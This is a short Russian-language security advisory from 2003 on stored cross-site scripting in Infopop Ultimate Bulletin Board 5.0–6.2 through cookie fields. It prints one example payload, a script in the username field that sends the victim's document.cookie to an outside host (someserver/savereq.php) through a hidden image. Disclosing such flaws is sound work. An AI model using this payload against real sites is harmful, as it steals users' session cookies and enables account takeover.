Межсайтовый скриптинг в Ultimate Bulletin Board

Дата публикации:
22.07.2003
Всего просмотров:
1225
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности входных данных обнаружена в Ultimate Bulletin Board. Удаленный пользователь может выполнить XSS нападения.

Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:

username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>
Уязвимость обнаружена в Infopop Ultimate Bulletin Board 5.0-6.2

Ссылки: anti_acid hotmail com
или введите имя

CAPTCHA